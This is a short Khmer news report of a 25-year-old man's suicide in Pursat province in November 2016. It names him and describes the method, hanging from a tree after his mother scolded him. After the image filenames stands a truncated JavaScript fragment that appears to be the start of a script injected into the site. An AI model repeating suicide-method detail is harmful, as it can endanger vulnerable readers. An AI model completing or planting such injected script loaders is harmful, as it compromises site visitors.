Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ខឹង​ម្តាយ​ស្តីបន្ទោសរត់ទៅចង ក បញ្ចប់ជីវិត

ពោធិ៍សាត់៖ ហេតុការណ៍នេះបង្កឲ្យមានការភ្ញាក់ផ្អើល នៅព្រឹកថ្ងៃទី២៨ ខែវិច្ឆិកា ឆ្នាំ២០១៦ នៅចំណុចដើមស្នាយ ក្នុងគុម្ពព្រៃឬស្សី ក្រោយផ្ទះជងរងគ្រោះប្រមាណ ១០០ម៉ែត្រ ស្ថិតក្នុងភូមិសំរោង ឃុំកញ្ជរ ស្រុកកណ្តៀង ខេត្តពោធិ៍សាត់។សាកសពបុរសចងកសម្លាប់ខ្លួនឯងនោះ មានឈ្មោះ កែប ម៉ាប់ អាយុ២៥ឆ្នាំ។ លោកអធិការបានបន្តថា កាលពីយប់ថ្ងៃទី២៧ ខែវិច្ឆិកា ម្តាយរបស់ជនរងគ្រោះ បានរករឿងថា «អាហ្ហែងទាត់ធុងប៉េត្រូអាញ់បែក អាញ់ឈប់ឲ្យប្រើហើយ» ពេលនោះរងគ្រោះ បានតូចចិត្តក៏ដើរចេញទៅបាត់ លុះដល់ព្រឹកឡើងប្រហែលម៉ោង៦៖១០ ទើបដឹងថាកូន ចងកសម្លាប់ខ្លួនឯង ជាមួយអាវយឺតពណ៌ក្រហម ជាប់នឹងដើមស្នាយ បង្កឲ្យមានការភ្ញាក់ផ្អើលតែម្តង៕

15230766_1285882514804312_9130042297229339805_n

15220032_1285882551470975_9094086136239919544_nvar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More